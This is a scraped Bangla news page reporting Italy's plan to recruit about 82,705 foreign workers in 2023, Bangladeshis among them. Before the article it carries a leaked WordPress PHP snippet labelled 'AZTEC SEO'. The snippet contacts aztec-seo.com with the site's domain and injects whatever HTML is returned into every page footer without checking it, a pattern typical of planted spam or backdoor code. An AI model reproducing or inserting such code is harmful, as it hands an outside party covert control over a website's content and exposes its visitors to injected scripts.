/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ৮২ হাজার কর্মী নেবে ইতালি | Dhaka Sky News

চীন-জার্মানির পর এবার হাইড্রোজেন ট্রেন চলবে ভারতে

আগের সংবাদ

শেখ হাসিনার নির্দেশনা বাস্তবায়নে ছাত্রলীগ দৃঢ়প্রতিজ্ঞ : সাইফুল

পরের সংবাদ

বাংলাদেশিদের জন্য সুখবর

৮২ হাজার কর্মী নেবে ইতালি

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 4, 2023 , 1:59 pm

ইতালিতে ৮২ হাজার শ্রমিক নেয়া হবে । ইতালির প্রধানমন্ত্রীর সচিব আলফ্রেদো মালতোবানো বিষয়টি তুলে ধরে সম্প্রতি এক বিবৃতি প্রকাশ করেন। কয়েক দিনের মধ্যে এ বিষয়ে চূড়ান্ত গেজেট প্রকাশের কথা রয়েছে। ইতালি সরকারের এই সিদ্ধান্তকে বাংলাদেশিদের জন্য বড় সুযোগ হিসেবে দেখছেন প্রবাসী কর্মিরা।

দেশটির নতুন সরকার জানিয়েছে, ২০২৩ সালে বিভিন্ন দেশ থেকে ৮২ হাজার ৭০৫ জন কর্মী নেবে ইতালি সরকার। কৃষি, পরিবহন, পর্যটন, জাহাজ নির্মাণ শিল্প, মেকানিক্স ও উৎপাদনশীল খাতের জন্য স্থায়ী ও মৌসুমি কাজের ভিত্তিতে এই শ্রমিকদের নেয়া হবে।

এ বিষয়ে কয়েক দিনের মধ্যে চূড়ান্ত গেজেট প্রকাশের কথা রয়েছে। সম্প্রতি ইতালির প্রধানমন্ত্রীর সচিব আলফ্রেদো মালতোবানো বিষয়টি তুলে ধরে এক বিবৃতি প্রকাশ করেন। এর আগে গত বছর বিভিন্ন ক্যাটাগরিতে ৬৯ হাজার স্পন্সর ভিসা দিয়েছিল ইতালি সরকার। বিশেষজ্ঞরা বলছেন, এ বছর বেশি ভিসা দেয়ায় অন্যান্যবারের চেয়ে কিছুটা কঠিন হবে ভিসা পাওয়ার নিয়ম।

দেশটির স্বরাষ্ট্র মন্ত্রণালয় জানিয়েছে, প্রাথমিকভাবে বাংলাদেশ, আইভরিকোস্ট, আলজেরিয়া, মিসর, এল সালভাদর, পাকিস্তান, ভারত, তিউনেশিয়াসহ ৩৩টি দেশ থেকে শ্রমিক নেবে ইতালি সরকার। দেশটি কৃষি ও অস্থায়ী ক্যাটাগরিতে ৪৪ হাজার এবং স্থায়ী স্পন্সর ক্যাটাগরিতে ৩৮ হাজার ৭০৫ জন শ্রমিক নেবে।